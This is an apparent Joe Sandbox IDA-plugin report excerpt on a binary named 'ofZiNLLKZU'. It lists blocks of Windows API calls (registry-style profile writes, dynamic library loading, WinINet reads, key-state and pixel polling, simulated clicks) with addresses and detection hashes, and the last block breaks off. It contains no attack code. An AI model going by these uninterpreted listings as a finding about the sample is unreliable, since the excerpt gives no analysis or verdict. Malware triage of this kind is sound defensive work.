                                                                                • Instruction Fuzzy Hash: 405136B5A00619AFCB14CF68C894AAAB7F9FF89310F158559F905DB350EB30E911CBA0
                                                                                APIs
                                                                                • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00648BAE
                                                                                • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00648BDA
                                                                                • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00648C32
                                                                                • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00648C57
                                                                                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00648C5F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: PrivateProfile$SectionWrite$String
                                                                                • String ID:
                                                                                • API String ID: 2832842796-0
                                                                                • Opcode ID: 6094e4cf0549da325dba7b10e18b8760f23da75e3a21b1b48c222c3228964b62
                                                                                • Instruction ID: 7adcdba04cf82268f04b39bd60f56620f20d4b93f02e3ef433408a219063e19a
                                                                                • Opcode Fuzzy Hash: 6094e4cf0549da325dba7b10e18b8760f23da75e3a21b1b48c222c3228964b62
                                                                                • Instruction Fuzzy Hash: 88515F35A002199FCB14DF65C884AADBBF6FF48314F08805AE849AB362DB31ED41CB91
                                                                                APIs
                                                                                • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00658F40
                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00658FD0
                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00658FEC
                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00659032
                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00659052
                                                                                  • Part of subcall function 005EF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00641043,?,7735E610), ref: 005EF6E6
                                                                                  • Part of subcall function 005EF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,0062FA64,00000000,00000000,?,?,00641043,?,7735E610,?,0062FA64), ref: 005EF70D
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                • String ID:
                                                                                • API String ID: 666041331-0
                                                                                • Opcode ID: 3e2e332795522f4f9d496444892963e07d394c8984cd753cf02cb594d1508dff
                                                                                • Instruction ID: a9bc2b3c26635eb7ea41b42f0951e60a5ee56f62f5d9ed3ec04eee09fb4e4ec9
                                                                                • Opcode Fuzzy Hash: 3e2e332795522f4f9d496444892963e07d394c8984cd753cf02cb594d1508dff
                                                                                • Instruction Fuzzy Hash: C2513C35600206DFC715DF58C4948ADBBB2FF89325F05809AE845AB762DB31ED8ACF91
                                                                                APIs
                                                                                • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00666C33
                                                                                • SetWindowLongW.USER32(?,000000EC,?), ref: 00666C4A
                                                                                • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00666C73
                                                                                • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0064AB79,00000000,00000000), ref: 00666C98
                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00666CC7
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Long$MessageSendShow
                                                                                • String ID:
                                                                                • API String ID: 3688381893-0
                                                                                • Opcode ID: e1dd12fb7c0fd102e8e6c196118750fc66536d9265fc274fbe5b547af298bec9
                                                                                • Instruction ID: c06cd98c614292af5253cf916d3ef9f74262638e7629fb3ddbbaed3783f9b74b
                                                                                • Opcode Fuzzy Hash: e1dd12fb7c0fd102e8e6c196118750fc66536d9265fc274fbe5b547af298bec9
                                                                                • Instruction Fuzzy Hash: 3041B435604504AFDB24DF28DC58FFA7FAAEB0A360F150269F895A73E0C371AD51CA90
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: _free
                                                                                • String ID:
                                                                                • API String ID: 269201875-0
                                                                                • Opcode ID: 7a4729bc28fbade243fa1b7caae614bddbf1b4226137c1897e0572ae99b5e430
                                                                                • Instruction ID: ee715d8c7bcc5e371e03231c8bbb8b319c4fd1f7ec9620ee49353d7fb15d37e8
                                                                                • Opcode Fuzzy Hash: 7a4729bc28fbade243fa1b7caae614bddbf1b4226137c1897e0572ae99b5e430
                                                                                • Instruction Fuzzy Hash: 9A41E632A403019FCB28DF78C894A9EB7B6EF89314F1545A9E615EB391DA31AD01CB80
                                                                                APIs
                                                                                • GetCursorPos.USER32(?), ref: 005E9141
                                                                                • ScreenToClient.USER32(00000000,?), ref: 005E915E
                                                                                • GetAsyncKeyState.USER32(00000001), ref: 005E9183
                                                                                • GetAsyncKeyState.USER32(00000002), ref: 005E919D
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: AsyncState$ClientCursorScreen
                                                                                • String ID:
                                                                                • API String ID: 4210589936-0
                                                                                • Opcode ID: 8472659fa6a8bc3bce704a774992b712f72d606d59d9125654cd838167b7c05d
                                                                                • Instruction ID: 471503d285b6772bbd02fdd6c324b19f78d3ae90830ffe4bb566e44a857284b8
                                                                                • Opcode Fuzzy Hash: 8472659fa6a8bc3bce704a774992b712f72d606d59d9125654cd838167b7c05d
                                                                                • Instruction Fuzzy Hash: 3C41707190891BFBDF099F65D848BEEBB75FF45324F248219E469A3290C7305960CF91
                                                                                APIs
                                                                                • GetInputState.USER32 ref: 006438CB
                                                                                • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00643922
                                                                                • TranslateMessage.USER32(?), ref: 0064394B
                                                                                • DispatchMessageW.USER32(?), ref: 00643955
                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00643966
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                • String ID:
                                                                                • API String ID: 2256411358-0
                                                                                • Opcode ID: d443fe160682bc3f8bde592a4943e9e496e72bda2905e2eacc56c384cbfa66ab
                                                                                • Instruction ID: d3edcf035987d0f1f7f0a1f87aecc6083898837291757ac9c168013471c58f57
                                                                                • Opcode Fuzzy Hash: d443fe160682bc3f8bde592a4943e9e496e72bda2905e2eacc56c384cbfa66ab
                                                                                • Instruction Fuzzy Hash: 1A31C8709043669EEB25DB349848BF677ABAB06304F04055DD4A2863A0F3F4A685CF11
                                                                                APIs
                                                                                • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,0064C21E,00000000), ref: 0064CF38
                                                                                • InternetReadFile.WININET(?,00000000,?,?), ref: 0064CF6F
                                                                                • GetLastError.KERNEL32(?,00000000,?,?,?,0064C21E,00000000), ref: 0064CFB4
                                                                                • SetEvent.KERNEL32(?,?,00000000,?,?,?,0064C21E,00000000), ref: 0064CFC8
                                                                                • SetEvent.KERNEL32(?,?,00000000,?,?,?,0064C21E,00000000), ref: 0064CFF2
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                                • String ID:
                                                                                • API String ID: 3191363074-0
                                                                                • Opcode ID: dc9d7c998699bc1c6a5150d4d9771e6f6acfa216239cb8ad1df53f81d2606581
                                                                                • Instruction ID: 6892af04e642290540eb3d244fabca7b82d2d5246c5f8c0a05cc74b45b30b010
                                                                                • Opcode Fuzzy Hash: dc9d7c998699bc1c6a5150d4d9771e6f6acfa216239cb8ad1df53f81d2606581
                                                                                • Instruction Fuzzy Hash: 91317C71601605EFDBA4DFA5C884AABBBFAEF14320B10442EF546D2301DB34AE45DB60
                                                                                APIs
                                                                                • GetWindowRect.USER32(?,?), ref: 00631915
                                                                                • PostMessageW.USER32(00000001,00000201,00000001), ref: 006319C1
                                                                                • Sleep.KERNEL32(00000000,?,?,?), ref: 006319C9
                                                                                • PostMessageW.USER32(00000001,00000202,00000000), ref: 006319DA
                                                                                • Sleep.KERNEL32(00000000,?,?,?,?), ref: 006319E2
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: MessagePostSleep$RectWindow
                                                                                • String ID:
                                                                                • API String ID: 3382505437-0
                                                                                • Opcode ID: 21d3418361c7f15dd6832e738755a4dc92918e25d3a547ac8bc270fce67db6fd
                                                                                • Instruction ID: b71a29a15e065c03ded6b51f5aeb36199f0244286082531a13eb7ae96b40a130
                                                                                • Opcode Fuzzy Hash: 21d3418361c7f15dd6832e738755a4dc92918e25d3a547ac8bc270fce67db6fd
                                                                                • Instruction Fuzzy Hash: 1F31C271900219EFCB04CFA8CD99BEE7BB6EB45325F104229F961EB2D1C7B09954DB90
                                                                                APIs
                                                                                • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00665745
                                                                                • SendMessageW.USER32(?,00001074,?,00000001), ref: 0066579D
                                                                                • _wcslen.LIBCMT ref: 006657AF
                                                                                • _wcslen.LIBCMT ref: 006657BA
                                                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00665816
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$_wcslen
                                                                                • String ID:
                                                                                • API String ID: 763830540-0
                                                                                • Opcode ID: aa28f0b840b33132a9f6678c5a167e13b937a3e5b26d680d29651847fdd96002
                                                                                • Instruction ID: c6cf3dfe9260e05c490ca0398d6ffd371114c2bfc3b348631c2ef02bae4ee7c5
                                                                                • Opcode Fuzzy Hash: aa28f0b840b33132a9f6678c5a167e13b937a3e5b26d680d29651847fdd96002
                                                                                • Instruction Fuzzy Hash: 8A21D871904619DADB209F60CC86AEE7BBAFF44724F108256F92AEB2C0D7749985CF50
                                                                                APIs
                                                                                • IsWindow.USER32(00000000), ref: 00650951
                                                                                • GetForegroundWindow.USER32 ref: 00650968
                                                                                • GetDC.USER32(00000000), ref: 006509A4
                                                                                • GetPixel.GDI32(00000000,?,00000003), ref: 006509B0
                                                                                • ReleaseDC.USER32(00000000,00000003), ref: 006509E8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Window$ForegroundPixelRelease
                                                                                • String ID:
                                                                                • API String ID: 4156661090-0
                                                                                • Opcode ID: 0ea1e90ebf6bfabf14000e2989313fc823f9c234ce65668d6d027ac3337dd96a
                                                                                • Instruction ID: 053bf697926f3b7c142dd0d4f8f9d98aa9fffb1f9d04bf92db2b44d00d88c690
                                                                                • Opcode Fuzzy Hash: 0ea1e90ebf6bfabf14000e2989313fc823f9c234ce65668d6d027ac3337dd96a
                                                                                • Instruction Fuzzy Hash: 4A218135600604AFE714EF69D888AAEBBE6FF45711F04806DE84AD7352DB70EC44CB90
                                                                                APIs
                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 0060CDC6
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0060CDE9
                                                                                  • Part of subcall function 00603820: RtlAllocateHeap.NTDLL(00000000,?,006A1444,?,005EFDF5,?,?,005DA976,00000010,006A1440,005D13FC,?,005D13C6,?,005D1129), ref: 00603852
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0060CE0F
                                                                                • _free.LIBCMT ref: 0060CE22
                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0060CE31
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                • String ID:
                                                                                • API String ID: 336800556-0
                                                                                • Opcode ID: db226ce47d7fc03b66bbb47f0fcf4bb15832a23d76bdebedafc0e6c4c50fb1a0
                                                                                • Instruction ID: 268e94e048c69eb7e2ec69ea1f04439176a57648288cbc8a3ab56c24bb3a0ae1
                                                                                • Opcode Fuzzy Hash: db226ce47d7fc03b66bbb47f0fcf4bb15832a23d76bdebedafc0e6c4c50fb1a0
                                                                                • Instruction Fuzzy Hash: 9301B5726416157FE32517BAAC4CC7B696FDFC6BB13150229FD05D6380DA608D0191B0
                                                                                APIs
                                                                                • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 005E9693
                                                                                • SelectObject.GDI32(?,00000000), ref: 005E96A2
                                                                                • BeginPath.GDI32(?), ref: 005E96B9
                                                                                • SelectObject.GDI32(?,00000000), ref: 005E96E2
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: ObjectSelect$BeginCreatePath
                                                                                • String ID:
                                                                                • API String ID: 3225163088-0
                                                                                • Opcode ID: 016577b0f7bd5894375485bb8d991d0a29af9a7679d6fdbc1e557770c9dd6dfc
                                                                                • Instruction ID: 1bdea61754c26b336252c0f7bbaf1abd3de955b35def1a8866a74805586bf55f
                                                                                • Opcode Fuzzy Hash: 016577b0f7bd5894375485bb8d991d0a29af9a7679d6fdbc1e557770c9dd6dfc
                                                                                • Instruction Fuzzy Hash: AC218330801385EBDB11AF65EC147EA7F66BB43365F101217F4909A1B0D3706991CF94
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: _memcmp
                                                                                • String ID:
                                                                                • API String ID: 2931989736-0
                                                                                • Opcode ID: d0d5bbb334e59dc7abe243707262d3588bc3195510bf557b01ea5506973c2b8f
                                                                                • Instruction ID: c27a76d7ae4e15d1a942633398af53d925dc6fc57f477dd7e2876830e8e73b19
                                                                                • Opcode Fuzzy Hash: d0d5bbb334e59dc7abe243707262d3588bc3195510bf557b01ea5506973c2b8f
                                                                                • Instruction Fuzzy Hash: CE01B561645A0AFBD2085610AD82FFB736FAB71394F414420FE069B281F764ED11C2E5
                                                                                APIs
                                                                                • GetLastError.KERNEL32(?,?,?,005FF2DE,00603863,006A1444,?,005EFDF5,?,?,005DA976,00000010,006A1440,005D13FC,?,005D13C6), ref: 00602DFD
                                                                                • _free.LIBCMT ref: 00602E32
                                                                                • _free.LIBCMT ref: 00602E59
                                                                                • SetLastError.KERNEL32(00000000,005D1129), ref: 00602E66
                                                                                • SetLastError.KERNEL32(00000000,005D1129), ref: 00602E6F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$_free
                                                                                • String ID:
                                                                                • API String ID: 3170660625-0
                                                                                • Opcode ID: 1596afe3c7c25deafbfadf1dcd7c6b78ca1f47bcf8742ee083584efdfb0e0112
                                                                                • Instruction ID: 5a3bf441b151e3b4b303bc2d7322360b02ffb5ad8ae4d37e43130a6c8aa6deef
                                                                                • Opcode Fuzzy Hash: 1596afe3c7c25deafbfadf1dcd7c6b78ca1f47bcf8742ee083584efdfb0e0112
                                                                                • Instruction Fuzzy Hash: D301F4362C5A0267C71A3735ACADD6B265FAFD17B5B21042DF965A23E2EF608C014124
                                                                                APIs
                                                                                • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0062FF41,80070057,?,?,?,0063035E), ref: 0063002B
                                                                                • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0062FF41,80070057,?,?), ref: 00630046
                                                                                • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0062FF41,80070057,?,?), ref: 00630054
                                                                                • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0062FF41,80070057,?), ref: 00630064
                                                                                • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0062FF41,80070057,?,?), ref: 00630070
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                • String ID:
                                                                                • API String ID: 3897988419-0
                                                                                • Opcode ID: 23aafc679a53d053e0da4cf3d34f2820e3119b44c3ee03562a5ece636140a71f
                                                                                • Instruction ID: c9d602c31deaa4cd0437d9bf09a819b06e661b626f8497759a9441fbd566ff24
                                                                                • Opcode Fuzzy Hash: 23aafc679a53d053e0da4cf3d34f2820e3119b44c3ee03562a5ece636140a71f
                                                                                • Instruction Fuzzy Hash: 61018B72600618BFEB245F68DC44BAA7EAFEB447A2F149128F945D3210E7B5DD448BE0
                                                                                APIs
                                                                                • QueryPerformanceCounter.KERNEL32(?), ref: 0063E997
                                                                                • QueryPerformanceFrequency.KERNEL32(?), ref: 0063E9A5
                                                                                • Sleep.KERNEL32(00000000), ref: 0063E9AD
                                                                                • QueryPerformanceCounter.KERNEL32(?), ref: 0063E9B7
                                                                                • Sleep.KERNEL32 ref: 0063E9F3
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                • String ID:
                                                                                • API String ID: 2833360925-0
                                                                                • Opcode ID: 6e75462a1994288ef64d39899b8e1f040beff9492093b5bf5c2385d972c5a4d7
                                                                                • Instruction ID: d4de55aeab07ec2d2811854dd5331b6df8f042268eb14a5e92a2559792e6849f
                                                                                • Opcode Fuzzy Hash: 6e75462a1994288ef64d39899b8e1f040beff9492093b5bf5c2385d972c5a4d7
